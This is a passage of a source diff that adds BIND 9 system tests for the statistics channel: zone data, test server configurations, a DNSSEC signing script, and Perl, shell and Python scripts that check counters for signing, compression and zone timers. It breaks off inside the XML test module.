+; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 + +manykeys. IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +manykeys. NS ns2.manykeys. +ns2.manykeys. A 10.53.0.2 + +$ORIGIN manykeys. +a A 10.0.0.1 + MX 10 mail.manykeys. +mail A 10.0.0.2 diff --git a/bin/tests/system/statschannel/ns2/named.conf.in b/bin/tests/system/statschannel/ns2/named.conf.in new file mode 100644 index 0000000..fd25fff --- /dev/null +++ b/bin/tests/system/statschannel/ns2/named.conf.in @@ -0,0 +1,72 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify no; + minimal-responses no; + version none; // make statistics independent of the version number +}; + +statistics-channels { inet 10.53.0.2 port @EXTRAPORT1@ allow { localhost; }; }; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +dnssec-policy "manykeys" { + keys { + ksk lifetime unlimited algorithm 8; + zsk lifetime unlimited algorithm 8; + ksk lifetime unlimited algorithm 13; + zsk lifetime unlimited algorithm 13; + ksk lifetime unlimited algorithm 14; + zsk lifetime unlimited algorithm 14; + }; +}; + +zone "example" { + type primary; + file "example.db"; + allow-transfer { any; }; +}; + +zone "dnssec" { + type primary; + file "dnssec.db.signed"; + auto-dnssec maintain; + allow-update { any; }; + zone-statistics full; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; +}; + +zone "manykeys" { + type primary; + file "manykeys.db.signed"; + allow-update { any; }; + zone-statistics full; + dnssec-policy "manykeys"; +}; diff --git a/bin/tests/system/statschannel/ns2/named2.conf.in b/bin/tests/system/statschannel/ns2/named2.conf.in new file mode 100644 index 0000000..d45f9f5 --- /dev/null +++ b/bin/tests/system/statschannel/ns2/named2.conf.in @@ -0,0 +1,68 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify no; + minimal-responses no; + version none; // make statistics independent of the version number +}; + +statistics-channels { inet 10.53.0.2 port @EXTRAPORT1@ allow { localhost; }; }; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +dnssec-policy "manykeys" { + keys { + ksk lifetime unlimited algorithm 8; + zsk lifetime unlimited algorithm 8; + }; +}; + +zone "example" { + type primary; + file "example.db"; + allow-transfer { any; }; +}; + +zone "dnssec" { + type primary; + file "dnssec.db.signed"; + auto-dnssec maintain; + allow-update { any; }; + zone-statistics full; + dnssec-dnskey-kskonly yes; + update-check-ksk yes; +}; + +zone "manykeys" { + type primary; + file "manykeys.db.signed"; + allow-update { any; }; + zone-statistics full; + dnssec-policy "manykeys"; +}; diff --git a/bin/tests/system/statschannel/ns2/sign.sh b/bin/tests/system/statschannel/ns2/sign.sh new file mode 100644 index 0000000..ab23550 --- /dev/null +++ b/bin/tests/system/statschannel/ns2/sign.sh @@ -0,0 +1,45 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +zone=dnssec. +infile=dnssec.db.in +zonefile=dnssec.db.signed +ksk=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone") +zsk=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +# Sign deliberately with a very short expiration date. +"$SIGNER" -P -S -x -O full -e "now"+1s -o "$zone" -f "$zonefile" "$infile" > "signzone.out.$zone" 2>&1 +keyfile_to_key_id "$ksk" > dnssec.ksk.id +keyfile_to_key_id "$zsk" > dnssec.zsk.id + +zone=manykeys. +infile=manykeys.db.in +zonefile=manykeys.db.signed +ksk8=$("$KEYGEN" -q -a RSASHA256 -b 2048 -f KSK "$zone") +zsk8=$("$KEYGEN" -q -a RSASHA256 -b 2048 "$zone") +ksk13=$("$KEYGEN" -q -a ECDSAP256SHA256 -b 256 -f KSK "$zone") +zsk13=$("$KEYGEN" -q -a ECDSAP256SHA256 -b 256 "$zone") +ksk14=$("$KEYGEN" -q -a ECDSAP384SHA384 -b 384 -f KSK "$zone") +zsk14=$("$KEYGEN" -q -a ECDSAP384SHA384 -b 384 "$zone") +# Sign deliberately with a very short expiration date. +"$SIGNER" -S -x -O full -e "now"+1s -o "$zone" -f "$zonefile" "$infile" > "signzone.out.$zone" 2>&1 +keyfile_to_key_id "$ksk8" > manykeys.ksk8.id +keyfile_to_key_id "$zsk8" > manykeys.zsk8.id +keyfile_to_key_id "$ksk13" > manykeys.ksk13.id +keyfile_to_key_id "$zsk13" > manykeys.zsk13.id +keyfile_to_key_id "$ksk14" > manykeys.ksk14.id +keyfile_to_key_id "$zsk14" > manykeys.zsk14.id diff --git a/bin/tests/system/statschannel/ns3/named.conf.in b/bin/tests/system/statschannel/ns3/named.conf.in new file mode 100644 index 0000000..5f08c3f --- /dev/null +++ b/bin/tests/system/statschannel/ns3/named.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify no; + minimal-responses no; + version none; // make statistics independent of the version number +}; + +statistics-channels { inet 10.53.0.3 port @EXTRAPORT1@ allow { localhost; }; }; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "example" { + type secondary; + file "example.db"; + primaries { 10.53.0.1; }; +}; diff --git a/bin/tests/system/statschannel/prereq.sh b/bin/tests/system/statschannel/prereq.sh new file mode 100644 index 0000000..4f8a444 --- /dev/null +++ b/bin/tests/system/statschannel/prereq.sh @@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +fail=0 + +if $PERL -e 'use File::Fetch;' 2>/dev/null +then + : +else + echo_i "This test requires the File::Fetch library." >&2 + fail=1 +fi + +exit $fail diff --git a/bin/tests/system/statschannel/server-json.pl b/bin/tests/system/statschannel/server-json.pl new file mode 100644 index 0000000..3715318 --- /dev/null +++ b/bin/tests/system/statschannel/server-json.pl @@ -0,0 +1,35 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# server-json.pl: +# Parses the JSON version of the server stats into a normalized format. + +use JSON; + +open(INPUT, "<json.stats"); +my $text = do{local$/;<INPUT>}; +close(INPUT); + +my $ref = decode_json($text); +foreach $key (keys %{$ref->{opcodes}}) { + print "opcode " . $key . ": " . $ref->{opcodes}->{$key} . "\n"; +} +foreach $key (keys %{$ref->{rcodes}}) { + print "rcode " . $key . ": " . $ref->{rcodes}->{$key} . "\n"; +} +foreach $key (keys %{$ref->{qtypes}}) { + print "qtype " . $key . ": " . $ref->{qtypes}->{$key} . "\n"; +} +foreach $key (keys %{$ref->{nsstats}}) { + print "nsstat " . $key . ": " . $ref->{nsstats}->{$key} . "\n"; +} diff --git a/bin/tests/system/statschannel/server-xml.pl b/bin/tests/system/statschannel/server-xml.pl new file mode 100644 index 0000000..5f76360 --- /dev/null +++ b/bin/tests/system/statschannel/server-xml.pl @@ -0,0 +1,25 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# server-xml.pl: +# Parses the XML version of the server stats into a normalized format. + +use XML::Simple; + +my $ref = XMLin("xml.stats"); +my $counters = $ref->{server}->{counters}; +foreach $group (@$counters) { + foreach $key (keys %{$group->{counter}}) { + print $group->{type} . " " . $key . ": ". $group->{counter}->{$key}->{content} . "\n"; + } +} diff --git a/bin/tests/system/statschannel/setup.sh b/bin/tests/system/statschannel/setup.sh new file mode 100644 index 0000000..4ebc39b --- /dev/null +++ b/bin/tests/system/statschannel/setup.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +for conf in ns*/named.conf.in; do + copy_setports "$conf" "$(dirname "$conf")/$(basename "$conf" .in)" +done + +(cd ns2 && $SHELL sign.sh) diff --git a/bin/tests/system/statschannel/tests.sh b/bin/tests/system/statschannel/tests.sh new file mode 100644 index 0000000..0480b01 --- /dev/null +++ b/bin/tests/system/statschannel/tests.sh @@ -0,0 +1,392 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +DIGCMD="$DIG @10.53.0.2 -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +if ! $FEATURETEST --have-json-c +then + unset PERL_JSON + echo_i "JSON was not configured; skipping" >&2 +elif $PERL -e 'use JSON;' 2>/dev/null +then + PERL_JSON=1 +else + unset PERL_JSON + echo_i "JSON tests require JSON library; skipping" >&2 +fi + +if ! $FEATURETEST --have-libxml2 +then + unset PERL_XML + echo_i "XML was not configured; skipping" >&2 +elif $PERL -e 'use XML::Simple;' 2>/dev/null +then + PERL_XML=1 +else + unset PERL_XML + echo_i "XML tests require XML::Simple; skipping" >&2 +fi + +if [ ! "$PERL_JSON" -a ! "$PERL_XML" ]; then + echo_i "skipping all tests" + exit 0 +fi + + +getzones() { + sleep 1 + echo_i "... using $1" + case $1 in + xml) path='xml/v3/zones' ;; + json) path='json/v1/zones' ;; + *) return 1 ;; + esac + file=`$PERL fetch.pl -p ${EXTRAPORT1} $path` + cp $file $file.$1.$3 + $PERL zones-${1}.pl $file $2 2>/dev/null | sort > zones.out.$3 + result=$? + return $result +} + +# TODO: Move loadkeys_on to conf.sh.common +loadkeys_on() { + nsidx=$1 + zone=$2 + nextpart ns${nsidx}/named.run > /dev/null + $RNDCCMD 10.53.0.${nsidx} loadkeys ${zone} | sed "s/^/ns${nsidx} /" | cat_i + wait_for_log 20 "next key event" ns${nsidx}/named.run +} + +status=0 +n=1 +ret=0 +echo_i "checking consistency between named.stats and xml/json ($n)" +rm -f ns2/named.stats +$DIGCMD +tcp example ns > dig.out.$n || ret=1 +$RNDCCMD 10.53.0.2 stats 2>&1 | sed 's/^/I:ns1 /' +query_count=`awk '/QUERY/ {print $1}' ns2/named.stats` +txt_count=`awk '/TXT/ {print $1}' ns2/named.stats` +noerror_count=`awk '/NOERROR/ {print $1}' ns2/named.stats` +if [ $PERL_XML ]; then + file=`$PERL fetch.pl -p ${EXTRAPORT1} xml/v3/server` + mv $file xml.stats + $PERL server-xml.pl > xml.fmtstats 2> /dev/null + xml_query_count=`awk '/opcode QUERY/ { print $NF }' xml.fmtstats` + xml_query_count=${xml_query_count:-0} + [ "$query_count" -eq "$xml_query_count" ] || ret=1 + xml_txt_count=`awk '/qtype TXT/ { print $NF }' xml.fmtstats` + xml_txt_count=${xml_txt_count:-0} + [ "$txt_count" -eq "$xml_txt_count" ] || ret=1 + xml_noerror_count=`awk '/rcode NOERROR/ { print $NF }' xml.fmtstats` + xml_noerror_count=${xml_noerror_count:-0} + [ "$noerror_count" -eq "$xml_noerror_count" ] || ret=1 +fi +if [ $PERL_JSON ]; then + file=`$PERL fetch.pl -p ${EXTRAPORT1} json/v1/server` + mv $file json.stats + $PERL server-json.pl > json.fmtstats 2> /dev/null + json_query_count=`awk '/opcode QUERY/ { print $NF }' json.fmtstats` + json_query_count=${json_query_count:-0} + [ "$query_count" -eq "$json_query_count" ] || ret=1 + json_txt_count=`awk '/qtype TXT/ { print $NF }' json.fmtstats` + json_txt_count=${json_txt_count:-0} + [ "$txt_count" -eq "$json_txt_count" ] || ret=1 + json_noerror_count=`awk '/rcode NOERROR/ { print $NF }' json.fmtstats` + json_noerror_count=${json_noerror_count:-0} + [ "$noerror_count" -eq "$json_noerror_count" ] || ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking malloced memory statistics xml/json ($n)" +if [ $PERL_XML ]; then + file=`$PERL fetch.pl -p ${EXTRAPORT1} xml/v3/mem` + mv $file xml.mem + $PERL mem-xml.pl $file > xml.fmtmem + grep "'Malloced' => '[0-9][0-9]*'" xml.fmtmem > /dev/null || ret=1 + grep "'malloced' => '[0-9][0-9]*'" xml.fmtmem > /dev/null || ret=1 + grep "'maxmalloced' => '[0-9][0-9]*'" xml.fmtmem > /dev/null || ret=1 +fi +if [ $PERL_JSON ]; then + file=`$PERL fetch.pl -p ${EXTRAPORT1} json/v1/mem` + mv $file json.mem + grep '"malloced":[0-9][0-9]*,' json.mem > /dev/null || ret=1 + grep '"maxmalloced":[0-9][0-9]*,' json.mem > /dev/null || ret=1 + grep '"Malloced":[0-9][0-9]*,' json.mem > /dev/null || ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "checking consistency between regular and compressed output ($n)" +for i in 1 2 3 4 5; do + ret=0 + if $FEATURETEST --have-libxml2; + then + URL=http://10.53.0.2:${EXTRAPORT1}/xml/v3/server + filter_str='s#<current-time>.*</current-time>##g' + else + URL=http://10.53.0.2:${EXTRAPORT1}/json/v1/server + filter_str='s#"current-time.*",##g' + fi + $CURL -D regular.headers $URL 2>/dev/null | \ + sed -e "$filter_str" > regular.out + $CURL -D compressed.headers --compressed $URL 2>/dev/null | \ + sed -e "$filter_str" > compressed.out + diff regular.out compressed.out >/dev/null || ret=1 + if [ $ret != 0 ]; then + echo_i "failed on try $i, probably a timing issue, trying again" + sleep 1 + else + break + fi +done + +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking if compressed output is really compressed ($n)" +if $FEATURETEST --with-zlib; +then + REGSIZE=`cat regular.headers | \ + grep -i Content-Length | sed -e "s/.*: \([0-9]*\).*/\1/"` + COMPSIZE=`cat compressed.headers | \ + grep -i Content-Length | sed -e "s/.*: \([0-9]*\).*/\1/"` + if [ ! `expr $REGSIZE / $COMPSIZE` -gt 2 ]; then + ret=1 + fi +else + echo_i "skipped" +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Test dnssec sign statistics. +zone="dnssec" +sign_prefix="dnssec-sign operations" +refresh_prefix="dnssec-refresh operations" +ksk_id=`cat ns2/$zone.ksk.id` +zsk_id=`cat ns2/$zone.zsk.id` + +# Test sign operations for scheduled resigning. +ret=0 +# The dnssec zone has 10 RRsets to sign (including NSEC) with the ZSK and one +# RRset (DNSKEY) with the KSK. So starting named with signatures that expire +# almost right away, this should trigger 10 zsk and 1 ksk sign operations. +echo "${refresh_prefix} ${zsk_id}: 10" > zones.expect +echo "${refresh_prefix} ${ksk_id}: 1" >> zones.expect +echo "${sign_prefix} ${zsk_id}: 10" >> zones.expect +echo "${sign_prefix} ${ksk_id}: 1" >> zones.expect +cat zones.expect | sort > zones.expect.$n +rm -f zones.expect +# Fetch and check the dnssec sign statistics. +echo_i "fetching zone '$zone' stats data after zone maintenance at startup ($n)" +if [ $PERL_XML ]; then + getzones xml $zone x$n || ret=1 + cmp zones.out.x$n zones.expect.$n || ret=1 +fi +if [ $PERL_JSON ]; then + getzones json 0 j$n || ret=1 + cmp zones.out.j$n zones.expect.$n || ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Test sign operations after dynamic update. +ret=0 +( +# Update dnssec zone to trigger signature creation. +echo zone $zone +echo server 10.53.0.2 "$PORT" +echo update add $zone. 300 in txt "nsupdate added me" +echo send +) | $NSUPDATE +# This should trigger the resign of SOA, TXT and NSEC (+3 zsk). +echo "${refresh_prefix} ${zsk_id}: 10" > zones.expect +echo "${refresh_prefix} ${ksk_id}: 1" >> zones.expect +echo "${sign_prefix} ${zsk_id}: 13" >> zones.expect +echo "${sign_prefix} ${ksk_id}: 1" >> zones.expect +cat zones.expect | sort > zones.expect.$n +rm -f zones.expect +# Fetch and check the dnssec sign statistics. +echo_i "fetching zone '$zone' stats data after dynamic update ($n)" +if [ $PERL_XML ]; then + getzones xml $zone x$n || ret=1 + cmp zones.out.x$n zones.expect.$n || ret=1 +fi +if [ $PERL_JSON ]; then + getzones json 0 j$n || ret=1 + cmp zones.out.j$n zones.expect.$n || ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Test sign operations of KSK. +ret=0 +echo_i "fetch zone '$zone' stats data after updating DNSKEY RRset ($n)" +# Add a standby DNSKEY, this triggers resigning the DNSKEY RRset. +zsk=$("$KEYGEN" -K ns2 -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone") +$SETTIME -K ns2 -P now -A never $zsk.key > /dev/null +loadkeys_on 2 $zone || ret=1 +# This should trigger the resign of SOA (+1 zsk) and DNSKEY (+1 ksk). +echo "${refresh_prefix} ${zsk_id}: 11" > zones.expect +echo "${refresh_prefix} ${ksk_id}: 2" >> zones.expect +echo "${sign_prefix} ${zsk_id}: 14" >> zones.expect +echo "${sign_prefix} ${ksk_id}: 2" >> zones.expect +cat zones.expect | sort > zones.expect.$n +rm -f zones.expect +# Fetch and check the dnssec sign statistics. +if [ $PERL_XML ]; then + getzones xml $zone x$n || ret=1 + cmp zones.out.x$n zones.expect.$n || ret=1 +fi +if [ $PERL_JSON ]; then + getzones json 0 j$n || ret=1 + cmp zones.out.j$n zones.expect.$n || ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Test sign operations for scheduled resigning (many keys). +ret=0 +zone="manykeys" +ksk8_id=`cat ns2/$zone.ksk8.id` +zsk8_id=`cat ns2/$zone.zsk8.id` +ksk13_id=`cat ns2/$zone.ksk13.id` +zsk13_id=`cat ns2/$zone.zsk13.id` +ksk14_id=`cat ns2/$zone.ksk14.id` +zsk14_id=`cat ns2/$zone.zsk14.id` +num_ids=$( (echo $ksk8_id; echo $zsk8_id; echo $ksk13_id; echo $zsk13_id; echo $ksk14_id; echo $zsk14_id;) | sort -u | wc -l) +# The dnssec zone has 10 RRsets to sign (including NSEC) with the ZSKs and one +# RRset (DNSKEY) with the KSKs. So starting named with signatures that expire +# almost right away, this should trigger 10 zsk and 1 ksk sign operations per +# key. +echo "${refresh_prefix} ${zsk8_id}: 10" > zones.expect +echo "${refresh_prefix} ${zsk13_id}: 10" >> zones.expect +echo "${refresh_prefix} ${zsk14_id}: 10" >> zones.expect +echo "${refresh_prefix} ${ksk8_id}: 1" >> zones.expect +echo "${refresh_prefix} ${ksk13_id}: 1" >> zones.expect +echo "${refresh_prefix} ${ksk14_id}: 1" >> zones.expect +echo "${sign_prefix} ${zsk8_id}: 10" >> zones.expect +echo "${sign_prefix} ${zsk13_id}: 10" >> zones.expect +echo "${sign_prefix} ${zsk14_id}: 10" >> zones.expect +echo "${sign_prefix} ${ksk8_id}: 1" >> zones.expect +echo "${sign_prefix} ${ksk13_id}: 1" >> zones.expect +echo "${sign_prefix} ${ksk14_id}: 1" >> zones.expect +cat zones.expect | sort > zones.expect.$n +rm -f zones.expect +# Fetch and check the dnssec sign statistics. +echo_i "fetching zone '$zone' stats data after zone maintenance at startup ($n)" +if test $num_ids -eq 6 +then + if [ $PERL_XML ]; then + getzones xml $zone x$n || ret=1 + cmp zones.out.x$n zones.expect.$n || ret=1 + fi + if [ $PERL_JSON ]; then + getzones json 2 j$n || ret=1 + cmp zones.out.j$n zones.expect.$n || ret=1 + fi + if [ $ret != 0 ]; then echo_i "failed"; fi +else + echo_i "skipped: duplicate key id detected (fixed in BIND 9.19)" +fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Test sign operations after dynamic update (many keys). +ret=0 +( +# Update dnssec zone to trigger signature creation. +echo zone $zone +echo server 10.53.0.2 "$PORT" +echo update add $zone. 300 in txt "nsupdate added me" +echo send +) | $NSUPDATE +# This should trigger the resign of SOA, TXT and NSEC (+3 zsk). +echo "${refresh_prefix} ${zsk8_id}: 10" > zones.expect +echo "${refresh_prefix} ${zsk13_id}: 10" >> zones.expect +echo "${refresh_prefix} ${zsk14_id}: 10" >> zones.expect +echo "${refresh_prefix} ${ksk8_id}: 1" >> zones.expect +echo "${refresh_prefix} ${ksk13_id}: 1" >> zones.expect +echo "${refresh_prefix} ${ksk14_id}: 1" >> zones.expect +echo "${sign_prefix} ${zsk8_id}: 13" >> zones.expect +echo "${sign_prefix} ${zsk13_id}: 13" >> zones.expect +echo "${sign_prefix} ${zsk14_id}: 13" >> zones.expect +echo "${sign_prefix} ${ksk8_id}: 1" >> zones.expect +echo "${sign_prefix} ${ksk13_id}: 1" >> zones.expect +echo "${sign_prefix} ${ksk14_id}: 1" >> zones.expect +cat zones.expect | sort > zones.expect.$n +rm -f zones.expect +# Fetch and check the dnssec sign statistics. +echo_i "fetching zone '$zone' stats data after dynamic update ($n)" +if test $num_ids -eq 6 +then + if [ $PERL_XML ]; then + getzones xml $zone x$n || ret=1 + cmp zones.out.x$n zones.expect.$n || ret=1 + fi + if [ $PERL_JSON ]; then + getzones json 2 j$n || ret=1 + cmp zones.out.j$n zones.expect.$n || ret=1 + fi + if [ $ret != 0 ]; then echo_i "failed"; fi +else + echo_i "skipped: duplicate key id detected (fixed in BIND 9.19)" +fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Test sign operations after dnssec-policy change (removing keys). +ret=0 +copy_setports ns2/named2.conf.in ns2/named.conf +$RNDCCMD 10.53.0.2 reload 2>&1 | sed 's/^/I:ns2 /' +# This should trigger the resign of DNSKEY (+1 ksk), and SOA, NSEC, +# TYPE65534 (+3 zsk). The dnssec-sign statistics for the removed keys should +# be cleared and thus no longer visible. But NSEC and SOA are (mistakenly) +# counted double, one time because of zone_resigninc and one time because of +# zone_nsec3chain. So +5 zsk in total. +echo "${refresh_prefix} ${zsk8_id}: 15" > zones.expect +echo "${refresh_prefix} ${ksk8_id}: 2" >> zones.expect +echo "${sign_prefix} ${zsk8_id}: 18" >> zones.expect +echo "${sign_prefix} ${ksk8_id}: 2" >> zones.expect +cat zones.expect | sort > zones.expect.$n +rm -f zones.expect +# Fetch and check the dnssec sign statistics. +echo_i "fetching zone '$zone' stats data after dnssec-policy change ($n)" +if [ $PERL_XML ]; then + getzones xml $zone x$n || ret=1 + cmp zones.out.x$n zones.expect.$n || ret=1 +fi +if [ $PERL_JSON ]; then + getzones json 2 j$n || ret=1 + cmp zones.out.j$n zones.expect.$n || ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/statschannel/tests_json.py b/bin/tests/system/statschannel/tests_json.py new file mode 100755 index 0000000..c459925 --- /dev/null +++ b/bin/tests/system/statschannel/tests_json.py @@ -0,0 +1,105 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from datetime import datetime + +import pytest + +import generic +import pytest_custom_markers + +pytestmark = pytest_custom_markers.have_json_c +requests = pytest.importorskip("requests") + + +# JSON helper functions +def fetch_zones_json(statsip, statsport): + r = requests.get( + "http://{}:{}/json/v1/zones".format(statsip, statsport), timeout=600 + ) + assert r.status_code == 200 + + data = r.json() + return data["views"]["_default"]["zones"] + + +def fetch_traffic_json(statsip, statsport): + r = requests.get( + "http://{}:{}/json/v1/traffic".format(statsip, statsport), timeout=600 + ) + assert r.status_code == 200 + + data = r.json() + + return data["traffic"] + + +def load_timers_json(zone, primary=True): + name = zone["name"] + + # Check if the primary zone timer exists + assert "loaded" in zone + loaded = datetime.strptime(zone["loaded"], generic.fmt) + + if primary: + # Check if the secondary zone timers does not exist + assert "expires" not in zone + assert "refresh" not in zone + expires = None + refresh = None + else: + assert "expires" in zone + assert "refresh" in zone + expires = datetime.strptime(zone["expires"], generic.fmt) + refresh = datetime.strptime(zone["refresh"], generic.fmt) + + return (name, loaded, expires, refresh) + + +def load_zone_json(zone): + name = zone["name"] + + return name + + +def test_zone_timers_primary_json(statsport): + generic.test_zone_timers_primary( + fetch_zones_json, + load_timers_json, + statsip="10.53.0.1", + statsport=statsport, + zonedir="ns1", + ) + + +def test_zone_timers_secondary_json(statsport): + generic.test_zone_timers_secondary( + fetch_zones_json, + load_timers_json, + statsip="10.53.0.3", + statsport=statsport, + zonedir="ns3", + ) + + +def test_zone_with_many_keys_json(statsport): + generic.test_zone_with_many_keys( + fetch_zones_json, load_zone_json, statsip="10.53.0.2", statsport=statsport + ) + + +def test_traffic_json(named_port, statsport): + generic_dnspython = pytest.importorskip("generic_dnspython") + generic_dnspython.test_traffic( + fetch_traffic_json, statsip="10.53.0.2", statsport=statsport, port=named_port + ) diff --git a/bin/tests/system/statschannel/tests_xml.py b/bin/tests/system/statschannel/tests_xml.py new file mode 100755 index 0000000..7f0b37e --- /dev/null +++ b/bin/tests/system/statschannel/tests_xml.py @@ -0,0 +1,135 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from datetime import datetime +import xml.etree.ElementTree as ET + +import pytest + +import generic +import pytest_custom_markers + +pytestmark = pytest_custom_markers.have_libxml2 +requests = pytest.importorskip("requests") + + +# XML helper functions +def fetch_zones_xml(statsip, statsport): + r = requests.get( + 